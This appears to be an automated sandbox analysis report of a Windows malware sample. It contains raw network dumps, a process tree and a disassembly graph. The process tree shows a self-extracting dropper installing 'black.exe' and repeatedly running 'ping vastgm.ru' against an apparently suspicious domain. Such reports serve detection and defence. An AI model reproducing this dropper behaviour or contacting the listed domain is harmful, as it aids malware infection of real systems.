                                                2024-12-09 06:03:47 UTC884INData Raw: 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 37 30 30 39 37 66 37 35 61 65 63 31 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f
                                                Data Ascii: rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-70097f75aec1.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_
                                                2024-12-09 06:03:47 UTC1370INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 70 72 69 6d 65 72 2d 70 72 69 6d 69 74 69 76 65 73 2d 35 32 65 61 38 30 62 37 34 35 35 34 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 70 72 69 6d 65 72 2d 61 66 38 34 36 38 35 30 34 38 31 65 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69
                                                Data Ascii: rel="stylesheet" href="https://github.githubassets.com/assets/primer-primitives-52ea80b74554.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-af846850481e.css" /> <link crossori
                                                2024-12-09 06:03:47 UTC1370INData Raw: 74 65 22 2c 22 6c 69 66 65 63 79 63 6c 65 5f 6c 61 62 65 6c 5f 6e 61 6d 65 5f 75 70 64 61 74 65 73 22 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 77 70 2d 72 75 6e 74 69 6d 65 2d 30 64 61 33 30 61 30 34 30 30 38 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d
                                                Data Ascii: te","lifecycle_label_name_updates"]}</script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-0da30a040080.js"></script><script crossorigin="anonymous" defer="defer" type=
                                                2024-12-09 06:03:47 UTC1370INData Raw: 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 66 36 39 30 66 64 39 61 65 33 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6c 61 74 69 76 65 2d 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 36 64 33 39 36 37 61 63 64 35 31 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c
                                                Data Ascii: st_index_esm_js-f690fd9ae3d5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js"></script><
                                                2024-12-09 06:03:47 UTC1370INData Raw: 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 76 69 65 77 2d 63 6f 2d 33 38 31 61 34 66 2d 35 39 39 32 35 38 33 32 66 37 37 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 67 69 74 68 75 62 2d 65 6c 65 6d 65 6e 74 73 2d 39 30 32 37 31 33 62 32 36 39 65 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69
                                                Data Ascii: nt-element_dist_index_js-node_modules_primer_view-co-381a4f-59925832f779.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-902713b269e2.js"></script><scri
                                                2024-12-09 06:03:47 UTC1370INData Raw: 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 66 6f 72 6d 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 2d 38 39 33 66 39 66 2d 36 63 66 33 33 32 30 34 31 36 62 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69
                                                Data Ascii: avascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascri
                                                2024-12-09 06:03:47 UTC140INData Raw: 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 61 6a 61 78 2d 65 72 72 6f 72 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 64 30 64 30 61 36 2d 38 33 30 33 37 36 32 34 34 36 39 31 2e 6a 73 22 3e 3c 2f 73 63
                                                Data Ascii: assets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-830376244691.js"></sc


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:01:03:37
                                                Start date:09/12/2024
                                                Path:C:\Users\user\Desktop\Y5kEUsYDFr.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\Y5kEUsYDFr.exe"
                                                Imagebase:0x7ff6ca9c0000
                                                File size:912'111 bytes
                                                MD5 hash:EC773998B0078CC58100FDB4D27DC3F4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:1
                                                Start time:01:03:37
                                                Start date:09/12/2024
                                                Path:C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe"
                                                Imagebase:0x120000
                                                File size:550'912 bytes
                                                MD5 hash:09929B04B0C29E2722009F49FAF7183C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 34%, ReversingLabs
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:2
                                                Start time:01:03:42
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /c ping vastgm.ru
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:01:03:42
                                                Start date:09/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:01:03:42
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                Wow64 process (32bit):true
                                                Commandline:ping vastgm.ru
                                                Imagebase:0xe40000
                                                File size:18'944 bytes
                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:01:03:50
                                                Start date:09/12/2024
                                                Path:C:\Users\user\AppData\Roaming\black.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\black.exe"
                                                Imagebase:0x300000
                                                File size:550'912 bytes
                                                MD5 hash:09929B04B0C29E2722009F49FAF7183C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 34%, ReversingLabs
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:9
                                                Start time:01:03:53
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /c ping vastgm.ru
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:01:03:53
                                                Start date:09/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:01:03:56
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                Wow64 process (32bit):true
                                                Commandline:ping vastgm.ru
                                                Imagebase:0xe40000
                                                File size:18'944 bytes
                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:18
                                                Start time:01:04:18
                                                Start date:09/12/2024
                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe"
                                                Imagebase:0x7ff6bc1b0000
                                                File size:5'641'176 bytes
                                                MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:23
                                                Start time:01:04:39
                                                Start date:09/12/2024
                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                Imagebase:0x7ff74bb60000
                                                File size:3'581'912 bytes
                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:26
                                                Start time:01:04:43
                                                Start date:09/12/2024
                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1644,i,11227877826786957155,3609580182791793806,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                Imagebase:0x7ff74bb60000
                                                File size:3'581'912 bytes
                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:36
                                                Start time:01:06:42
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /c ping vastgm.ru
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                General

                                                Target ID:37
                                                Start time:01:06:42
                                                Start date:09/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                General

                                                Target ID:38
                                                Start time:01:06:47
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                Wow64 process (32bit):true
                                                Commandline:ping vastgm.ru
                                                Imagebase:0xe40000
                                                File size:18'944 bytes
                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                General

                                                Target ID:39
                                                Start time:01:06:54
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /c ping vastgm.ru
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                General

                                                Target ID:40
                                                Start time:01:06:54
                                                Start date:09/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                General

                                                Target ID:41
                                                Start time:01:06:59
                                                Start date:09/12/2024
                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                Wow64 process (32bit):true
                                                Commandline:ping vastgm.ru
                                                Imagebase:0xe40000
                                                File size:18'944 bytes
                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:11.9%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:28%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:26
                                                  execution_graph 25369 7ff6ca9f1552 25371 7ff6ca9f14a2 25369->25371 25372 7ff6ca9f1900 25371->25372 25398 7ff6ca9f1558 25372->25398 25375 7ff6ca9f198b 25376 7ff6ca9f1868 DloadReleaseSectionWriteAccess 6 API calls 25375->25376 25377 7ff6ca9f1998 RaiseException 25376->25377 25378 7ff6ca9f1bb5 25377->25378 25378->25371 25379 7ff6ca9f1a3d LoadLibraryExA 25381 7ff6ca9f1a54 GetLastError 25379->25381 25382 7ff6ca9f1aa9 25379->25382 25380 7ff6ca9f1b85 25406 7ff6ca9f1868 25380->25406 25387 7ff6ca9f1a7e 25381->25387 25388 7ff6ca9f1a69 25381->25388 25383 7ff6ca9f1ab4 FreeLibrary 25382->25383 25385 7ff6ca9f1abd 25382->25385 25383->25385 25384 7ff6ca9f19b4 25384->25379 25384->25380 25384->25382 25384->25385 25385->25380 25386 7ff6ca9f1b1b GetProcAddress 25385->25386 25386->25380 25391 7ff6ca9f1b30 GetLastError 25386->25391 25390 7ff6ca9f1868 DloadReleaseSectionWriteAccess 6 API calls 25387->25390 25388->25382 25388->25387 25392 7ff6ca9f1a8b RaiseException 25390->25392 25393 7ff6ca9f1b45 25391->25393 25392->25378 25393->25380 25394 7ff6ca9f1868 DloadReleaseSectionWriteAccess 6 API calls 25393->25394 25395 7ff6ca9f1b67 RaiseException 25394->25395 25396 7ff6ca9f1558 _com_raise_error 6 API calls 25395->25396 25397 7ff6ca9f1b81 25396->25397 25397->25380 25399 7ff6ca9f156e 25398->25399 25400 7ff6ca9f15d3 25398->25400 25414 7ff6ca9f1604 25399->25414 25400->25375 25400->25384 25403 7ff6ca9f15ce 25405 7ff6ca9f1604 DloadReleaseSectionWriteAccess 3 API calls 25403->25405 25405->25400 25407 7ff6ca9f1878 25406->25407 25413 7ff6ca9f18d1 25406->25413 25408 7ff6ca9f1604 DloadReleaseSectionWriteAccess 3 API calls 25407->25408 25409 7ff6ca9f187d 25408->25409 25410 7ff6ca9f18cc 25409->25410 25411 7ff6ca9f17d8 DloadProtectSection 3 API calls 25409->25411 25412 7ff6ca9f1604 DloadReleaseSectionWriteAccess 3 API calls 25410->25412 25411->25410 25412->25413 25413->25378 25415 7ff6ca9f1573 25414->25415 25416 7ff6ca9f161f 25414->25416 25415->25403 25421 7ff6ca9f17d8 25415->25421 25416->25415 25417 7ff6ca9f1624 GetModuleHandleW 25416->25417 25418 7ff6ca9f163e GetProcAddress 25417->25418 25420 7ff6ca9f1639 25417->25420 25419 7ff6ca9f1653 GetProcAddress 25418->25419 25418->25420 25419->25420 25420->25415 25423 7ff6ca9f17fa DloadProtectSection 25421->25423 25422 7ff6ca9f1802 25422->25403 25423->25422 25424 7ff6ca9f183a VirtualProtect 25423->25424 25426 7ff6ca9f16a4 VirtualQuery GetSystemInfo 25423->25426 25424->25422 25426->25424 25427 7ff6ca9f03e0 25428 7ff6ca9f041f 25427->25428 25429 7ff6ca9f0497 25427->25429 25430 7ff6ca9daae0 48 API calls 25428->25430 25452 7ff6ca9daae0 25429->25452 25432 7ff6ca9f0433 25430->25432 25467 7ff6ca9dda98 25432->25467 25434 7ff6ca9dda98 48 API calls 25439 7ff6ca9f0442 BuildCatchObjectHelperInternal 25434->25439 25437 7ff6ca9f0541 25464 7ff6ca9c250c 25437->25464 25438 7ff6ca9f05cc 25443 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25438->25443 25439->25438 25440 7ff6ca9f05c6 25439->25440 25459 7ff6ca9c1fa0 25439->25459 25470 7ff6ca9f7904 25440->25470 25445 7ff6ca9f05d2 25443->25445 25453 7ff6ca9daaf3 25452->25453 25475 7ff6ca9d9774 25453->25475 25456 7ff6ca9dab86 25456->25434 25457 7ff6ca9dab58 LoadStringW 25457->25456 25458 7ff6ca9dab71 LoadStringW 25457->25458 25458->25456 25460 7ff6ca9c1fb3 25459->25460 25461 7ff6ca9c1fdc 25459->25461 25460->25461 25462 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25460->25462 25461->25437 25463 7ff6ca9c2000 25462->25463 25465 7ff6ca9c2513 25464->25465 25466 7ff6ca9c2516 SetDlgItemTextW 25464->25466 25465->25466 25512 7ff6ca9dd874 25467->25512 25605 7ff6ca9f783c 31 API calls 3 library calls 25470->25605 25472 7ff6ca9f791d 25606 7ff6ca9f7934 16 API calls abort 25472->25606 25482 7ff6ca9d9638 25475->25482 25478 7ff6ca9d97d9 25492 7ff6ca9f2320 25478->25492 25483 7ff6ca9d9692 25482->25483 25491 7ff6ca9d9730 25482->25491 25484 7ff6ca9d96c0 25483->25484 25505 7ff6ca9e0f68 WideCharToMultiByte 25483->25505 25488 7ff6ca9d96ef 25484->25488 25507 7ff6ca9daa88 45 API calls _snwprintf 25484->25507 25486 7ff6ca9f2320 _handle_error 8 API calls 25487 7ff6ca9d9764 25486->25487 25487->25478 25501 7ff6ca9d9800 25487->25501 25508 7ff6ca9fa270 31 API calls 2 library calls 25488->25508 25491->25486 25493 7ff6ca9f2329 25492->25493 25494 7ff6ca9d97f2 25493->25494 25495 7ff6ca9f2550 IsProcessorFeaturePresent 25493->25495 25494->25456 25494->25457 25496 7ff6ca9f2568 25495->25496 25509 7ff6ca9f2744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25496->25509 25498 7ff6ca9f257b 25510 7ff6ca9f2510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25498->25510 25502 7ff6ca9d9840 25501->25502 25504 7ff6ca9d9869 25501->25504 25511 7ff6ca9fa270 31 API calls 2 library calls 25502->25511 25504->25478 25506 7ff6ca9e0faa 25505->25506 25506->25484 25507->25488 25508->25491 25509->25498 25511->25504 25528 7ff6ca9dd4d0 25512->25528 25517 7ff6ca9dd8e5 _snwprintf 25524 7ff6ca9dd974 25517->25524 25542 7ff6ca9f9ef0 25517->25542 25569 7ff6ca9c9d78 33 API calls 25517->25569 25519 7ff6ca9dda17 25520 7ff6ca9f2320 _handle_error 8 API calls 25519->25520 25522 7ff6ca9dda2b 25520->25522 25521 7ff6ca9dda3f 25523 7ff6ca9f7904 _invalid_parameter_noinfo_noreturn 31 API calls 25521->25523 25522->25439 25525 7ff6ca9dda44 25523->25525 25526 7ff6ca9dd9a3 25524->25526 25570 7ff6ca9c9d78 33 API calls 25524->25570 25526->25519 25526->25521 25529 7ff6ca9dd665 25528->25529 25531 7ff6ca9dd502 25528->25531 25532 7ff6ca9dcb80 25529->25532 25530 7ff6ca9c1744 33 API calls 25530->25531 25531->25529 25531->25530 25533 7ff6ca9dcbb6 25532->25533 25540 7ff6ca9dcc80 25532->25540 25535 7ff6ca9dcbc6 25533->25535 25537 7ff6ca9dcc7b 25533->25537 25538 7ff6ca9dcc20 25533->25538 25535->25517 25580 7ff6ca9c1f80 33 API calls 3 library calls 25537->25580 25538->25535 25571 7ff6ca9f21d0 25538->25571 25581 7ff6ca9c2004 33 API calls std::_Xinvalid_argument 25540->25581 25543 7ff6ca9f9f4e 25542->25543 25544 7ff6ca9f9f36 25542->25544 25543->25544 25545 7ff6ca9f9f58 25543->25545 25593 7ff6ca9fd69c 15 API calls _set_errno_from_matherr 25544->25593 25595 7ff6ca9f7ef0 35 API calls 2 library calls 25545->25595 25548 7ff6ca9f9f3b 25594 7ff6ca9f78e4 31 API calls _invalid_parameter_noinfo 25548->25594 25550 7ff6ca9f9f69 __scrt_get_show_window_mode 25596 7ff6ca9f7e70 15 API calls _set_errno_from_matherr 25550->25596 25551 7ff6ca9f2320 _handle_error 8 API calls 25552 7ff6ca9fa10b 25551->25552 25552->25517 25554 7ff6ca9f9fd4 25597 7ff6ca9f82f8 46 API calls 3 library calls 25554->25597 25556 7ff6ca9f9fdd 25557 7ff6ca9f9fe5 25556->25557 25558 7ff6ca9fa014 25556->25558 25598 7ff6ca9fd90c 25557->25598 25560 7ff6ca9fa06c 25558->25560 25561 7ff6ca9fa023 25558->25561 25562 7ff6ca9fa092 25558->25562 25565 7ff6ca9fa01a 25558->25565 25566 7ff6ca9fd90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 25560->25566 25564 7ff6ca9fd90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 25561->25564 25562->25560 25563 7ff6ca9fa09c 25562->25563 25567 7ff6ca9fd90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 25563->25567 25568 7ff6ca9f9f46 25564->25568 25565->25560 25565->25561 25566->25568 25567->25568 25568->25551 25569->25517 25570->25526 25572 7ff6ca9f21db 25571->25572 25573 7ff6ca9f21f4 25572->25573 25575 7ff6ca9f21fa 25572->25575 25582 7ff6ca9fbbc0 25572->25582 25573->25535 25576 7ff6ca9f2205 25575->25576 25585 7ff6ca9f2f7c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25575->25585 25586 7ff6ca9c1f80 33 API calls 3 library calls 25576->25586 25579 7ff6ca9f220b 25580->25540 25587 7ff6ca9fbc00 25582->25587 25585->25576 25586->25579 25592 7ff6ca9ff398 EnterCriticalSection 25587->25592 25593->25548 25594->25568 25595->25550 25596->25554 25597->25556 25599 7ff6ca9fd911 RtlFreeHeap 25598->25599 25600 7ff6ca9fd941 Concurrency::details::SchedulerProxy::DeleteThis 25598->25600 25599->25600 25601 7ff6ca9fd92c 25599->25601 25600->25568 25604 7ff6ca9fd69c 15 API calls _set_errno_from_matherr 25601->25604 25603 7ff6ca9fd931 GetLastError 25603->25600 25604->25603 25605->25472 25607 7ff6ca9eb190 25942 7ff6ca9c255c 25607->25942 25609 7ff6ca9eb1db 25610 7ff6ca9ebe93 25609->25610 25611 7ff6ca9eb1ef 25609->25611 25619 7ff6ca9eb20c 25609->25619 26218 7ff6ca9ef390 25610->26218 25614 7ff6ca9eb1ff 25611->25614 25615 7ff6ca9eb2db 25611->25615 25611->25619 25614->25619 25627 7ff6ca9daae0 48 API calls 25614->25627 25621 7ff6ca9eb391 25615->25621 25625 7ff6ca9eb2f5 25615->25625 25616 7ff6ca9f2320 _handle_error 8 API calls 25620 